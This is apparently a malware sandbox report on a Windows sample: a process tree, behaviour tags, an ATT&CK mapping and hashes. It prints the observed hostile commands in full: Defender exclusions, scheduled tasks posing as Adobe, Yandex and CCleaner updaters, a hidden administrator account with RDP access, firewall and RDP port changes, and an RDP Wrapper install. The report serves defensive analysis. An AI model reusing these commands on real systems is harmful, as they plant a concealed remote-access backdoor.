    - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Uno.exe.com f
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2432
      - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        6⤵
        Executes dropped EXE
        Drops Chrome extension
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3316
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^PDJplZmnTgtAyDiuBpyEpVkwfrgXvSPrnafATkwmhgkjZWXWVrVrLcJTaHUuLBwqmqeNgGhdiGdVJYwauseaWLaeJcoksUNMjkNZUpIfQEVtyOpzFBqzmJrNHqrSnwZhSEInkenWINBs$" Raccontero.aiff
      4⤵
      PID:3760
  - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com
      Inebriato.exe.com R
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3168
    - - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\Inebriato.exe.com R
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1484
      - C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        
        C:\Users\Admin\AppData\Roaming\ZsIZHoTjaXxaglVAZYbZnzaBfiWVlDIGryDMZfknXPYrkguKlJRzdTsFZiJmjXwOfOfoGpBKNZeIcffwqkLALgfpOXMSFLjZNpNbYYrqoi\RegAsm.exe
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1952
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles"""
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:2092
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath ""$env:ProgramFiles""
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4752
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata"""
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2516
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath ""$env:Appdata""
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3784
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4608
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2456
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe""
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1360
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3148
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\DsOXE\1149.vbs" "C:\Users\Admin\AppData\Roaming\DsOXE\921.vbs
        7⤵
        
        PID:3316
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\DsOXE\1149.vbs" "C:\Users\Admin\AppData\Roaming\DsOXE\921.vbs
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3540
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\DsOXE\78.vbs" bQDOnCDXpo ixHdEJsdxl "C:\Users\Admin\AppData\Roaming\DsOXE\591.vbs" "C:\Users\Admin\AppData\Roaming\DsOXE\eeDSvAjL.bat" "C:\Users\Admin\AppData\Roaming\DsOXE\HGj.dll"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2976
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\DsOXE\78.vbs" bQDOnCDXpo ixHdEJsdxl "C:\Users\Admin\AppData\Roaming\DsOXE\591.vbs" "C:\Users\Admin\AppData\Roaming\DsOXE\eeDSvAjL.bat" "C:\Users\Admin\AppData\Roaming\DsOXE\HGj.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4680
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\DsOXE\HGj.dll" /tn "Adobe Flash Player Updater76"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1476
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\DsOXE\HGj.dll" /tn "Adobe Flash Player Updater76"
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:432
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\DsOXE\360.vbs" "C:\Users\Admin\AppData\Roaming\DsOXE\921.vbs" "C:\Users\Admin\AppData\Roaming\DsOXE\HGj.dll"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4580
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\DsOXE\360.vbs" "C:\Users\Admin\AppData\Roaming\DsOXE\921.vbs" "C:\Users\Admin\AppData\Roaming\DsOXE\HGj.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3124
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\DsOXE\HGj.dll" /tn "Обновление Браузера Яндекс11"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3744
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\DsOXE\HGj.dll" /tn "Обновление Браузера Яндекс11"
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1436
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\DsOXE\FLANPrpLAu.bat bQDOnCDXpo ixHdEJsdxl"
        7⤵
        
        PID:460
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3424
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-544" get name /value
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2248
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4528
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic group where sid="S-1-5-32-555" get name /value
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4636
        
        C:\Windows\SysWOW64\net.exe
        
        net user bQDOnCDXpo ixHdEJsdxl /add
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4416
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user bQDOnCDXpo ixHdEJsdxl /add
        9⤵
        
        PID:760
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup Administrators bQDOnCDXpo /add
        8⤵
        
        PID:2872
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators bQDOnCDXpo /add
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3236
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" bQDOnCDXpo /add
        8⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:1524
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" bQDOnCDXpo /add
        9⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:948
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        8⤵
        
        PID:4312
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3300
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v bQDOnCDXpo /t REG_DWORD /d "00000000" /f
        8⤵
        Hide Artifacts: Hidden Users
        System Location Discovery: System Language Discovery
        
        PID:4856
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
        8⤵
        
        PID:2972
        
        C:\Windows\SysWOW64\netsh.exe
        
        netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
        8⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4308
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:768
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3208
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1732
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2312
        
        C:\Windows\SysWOW64\timeout.exe
        
        Timeout /t 15
        8⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:4304
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Program Files\RDP Wrapper\rdpwrap.bat"
        7⤵
        Drops file in Program Files directory
        
        PID:1476
        
        C:\Windows\SysWOW64\fsutil.exe
        
        fsutil dirty query C:
        8⤵
        
        PID:1652
        
        C:\Windows\SysWOW64\sc.exe
        
        sc queryex "TermService"
        8⤵
        Launches sc.exe
        
        PID:1872
        
        C:\Windows\SysWOW64\find.exe
        
        find "STATE"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3232
        
        C:\Windows\SysWOW64\find.exe
        
        find /v "RUNNING"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1076
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4204
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
        8⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in System32 directory
        Drops file in Program Files directory
        
        PID:3744
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:3772
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        8⤵
        
        PID:1704
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4292
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c query session rdp-tcp
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4268
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
        8⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        
        PID:3484
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4644
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
        8⤵
        Server Software Component: Terminal Services DLL
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        System Location Discovery: System Language Discovery
        
        PID:2952
        
        C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        9⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4360
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:636
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3124
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3232
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        8⤵
        
        PID:4848
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"
        9⤵
        
        PID:2280
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" 2>nul
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1604
        
        C:\Windows\SysWOW64\reg.exe
        
        reg query "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3060
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\RDP-Wrapper\Autoupdate" /v "termsrv.dll" /t REG_SZ /d "10.0.19041.1202" /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4968
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3300
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1644
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript //nologo "C:\Program Files\RDP Wrapper\rdpwrap.bat?.wsf" //job:fileDownload "https://raw.githubusercontent.com/asmtron/rdpwrap/master/res/rdpwrap.ini" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        9⤵
        Blocklisted process makes network request
        Drops file in Program Files directory
        
        PID:4548
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c findstr /n "^" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3212
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /n "^" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3904
        
        C:\Program Files\RDP Wrapper\RDPWInst.exe
        
        "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
        8⤵
        Executes dropped EXE
        
        PID:5044
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3156
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3572
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /c:"[10.0.19041.1202]" "C:\Program Files\RDP Wrapper\rdpwrap_new.ini"
        8⤵
        
        PID:3220
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cscript.exe "C:\Users\Admin\AppData\Roaming\DsOXE\156.vbs" "C:\Users\Admin\AppData\Roaming\DsOXE\740.vbs" "WkcxYVVsQlhTbEpTUlRsMVVUQlNXV05IT0cxV01VNVNVWG94Y0dWRmFHdFNWWEI2V2tob2MwcHRhSFZYVlRreVV6QlZPV1Y2CmF6RlNSRTB4VVZSUmVreFVXVEpOYWxsMENrNUVXWHBTVXpBMFRsUnJNVXhVVGtWTk1FVXdUakJHUTFKVVdrVk5iakE5" "C:\Users\Admin\AppData\Roaming\DsOXE\HGj.dll"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:2432
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript.exe "C:\Users\Admin\AppData\Roaming\DsOXE\156.vbs" "C:\Users\Admin\AppData\Roaming\DsOXE\740.vbs" "WkcxYVVsQlhTbEpTUlRsMVVUQlNXV05IT0cxV01VNVNVWG94Y0dWRmFHdFNWWEI2V2tob2MwcHRhSFZYVlRreVV6QlZPV1Y2CmF6RlNSRTB4VVZSUmVreFVXVEpOYWxsMENrNUVXWHBTVXpBMFRsUnJNVXhVVGtWTk1FVXdUakJHUTFKVVdrVk5iakE5" "C:\Users\Admin\AppData\Roaming\DsOXE\HGj.dll"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:464
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\DsOXE\HGj.dll" /tn "CCleanerSkipUAC30"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3408
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks.exe /Create /XML "C:\Users\Admin\AppData\Roaming\DsOXE\HGj.dll" /tn "CCleanerSkipUAC30"
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:4996
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 30
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4140

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:1604

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:3544

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:1184

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Roaming\DsOXE\591.vbs" bQDOnCDXpo ixHdEJsdxl "C:\Users\Admin\AppData\Roaming\DsOXE\eeDSvAjL.bat"
1⤵
- Checks computer location settings
PID:1324
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\DsOXE\eeDSvAjL.bat
  2⤵
  - Drops file in System32 directory
  PID:2936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-544" get name /value"
    3⤵
    PID:772
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic group where sid="S-1-5-32-544" get name /value
      4⤵
      PID:3208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic group where sid="S-1-5-32-555" get name /value"
    3⤵
    PID:1252
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic group where sid="S-1-5-32-555" get name /value
      4⤵
      PID:1316
- - C:\Windows\system32\net.exe
    net user bQDOnCDXpo ixHdEJsdxl /add
    3⤵
    PID:4248
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user bQDOnCDXpo ixHdEJsdxl /add
      4⤵
      PID:3504
- - C:\Windows\system32\net.exe
    net localgroup Administrators bQDOnCDXpo /add
    3⤵
    PID:4756
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators bQDOnCDXpo /add
      4⤵
      PID:1896
- - C:\Windows\system32\net.exe
    net localgroup Remote Desktop Users bQDOnCDXpo /add
    3⤵
    PID:4908
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Remote Desktop Users bQDOnCDXpo /add
      4⤵
      PID:3852
- - C:\Windows\system32\net.exe
    net accounts /maxpwage:unlimited
    3⤵
    PID:116
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 accounts /maxpwage:unlimited
      4⤵
      PID:2708
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v bQDOnCDXpo /t REG_DWORD /d "00000000" /f
    3⤵
    - Hide Artifacts: Hidden Users
    PID:4648
- - C:\Windows\system32\reg.exe
    reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "PortNumber" /t REG_DWORD /d 13389 /f
    3⤵
    PID:1448
- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall add rule name="RDP Port 13389" profile=any protocol=TCP action=allow dir=in localport=13389
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2916
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1244
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath "$env:Appdata"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3988
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4752
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:4656
- - C:\Windows\system32\timeout.exe
    Timeout /t 15
    3⤵
    - Delays execution with timeout.exe
    PID:4476

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4632

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4932

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Password Policy Discovery

T1201

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\RDP Wrapper\RDPWInst.exe

Filesize
1.4MB

MD5
3288c284561055044c489567fd630ac2

SHA1
11ffeabbe42159e1365aa82463d8690c845ce7b7

SHA256
